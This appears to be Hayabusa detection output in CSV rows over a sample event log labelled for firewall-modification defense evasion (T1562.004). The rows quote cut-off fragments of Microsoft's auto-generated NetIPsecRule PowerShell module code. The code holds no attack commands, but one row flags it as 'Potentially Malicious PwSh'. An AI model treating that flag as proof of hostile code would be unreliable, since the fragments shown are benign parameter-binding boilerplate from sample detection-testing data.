[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter 
= [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine},../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,y'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent 
= $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; 
ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' -Alias '*' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$tr",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; 
